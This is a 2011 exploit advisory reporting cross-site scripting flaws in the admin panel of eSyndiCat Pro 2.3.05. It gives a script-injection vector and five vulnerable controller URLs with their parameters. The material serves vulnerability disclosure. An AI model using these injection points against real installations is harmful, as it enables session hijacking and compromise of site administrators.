eSyndiCat Pro version 2.3.05 suffers from a cross site scripting vulnerability.
a881de1b7ecd810c25106d0c9006ec4cb8cf175600183fbd33ec8e537063deff
################################################################################################
# Exploit Title: eSyndiCat Pro v2.3.05 Cross-Site Scripting ( XSS )
# Script Page : https://www.esyndicat.com
# Date: 24:11:2011
# Author : RandomStorm - https://www.randomstorm.com
# Avram Marius Gabriel (d3v1l)
# Tested on: Windows XP & Vista (IE9 - Firefox 8.0)
# Note: Redirect and Html Injection can be performed also
# Vendor has been alerted !
################################################################################################
# POC:
# Admin Panel
# Vector: "><script>alert('XSS')</script>
# https://www.esyndicat.com/demo/admin/controller.php?file=admins&do=edit&id=XSS
# https://www.esyndicat.com/demo/admin/controller.php?file=blocks&do=edit&id=XSS
# https://www.esyndicat.com/demo/admin/controller.php?plugin=articles&do=edit&id=XSS
# https://www.esyndicat.com/demo/admin/controller.php?file=suggest-category&id=XSS
# https://www.esyndicat.com/demo/admin/controller.php?file=search&_dc=1322239437555&action=get&start=0&limit=10&sort=XSS
# Screenshot: https://i.imgur.com/bsesB.jpg
################################################################################################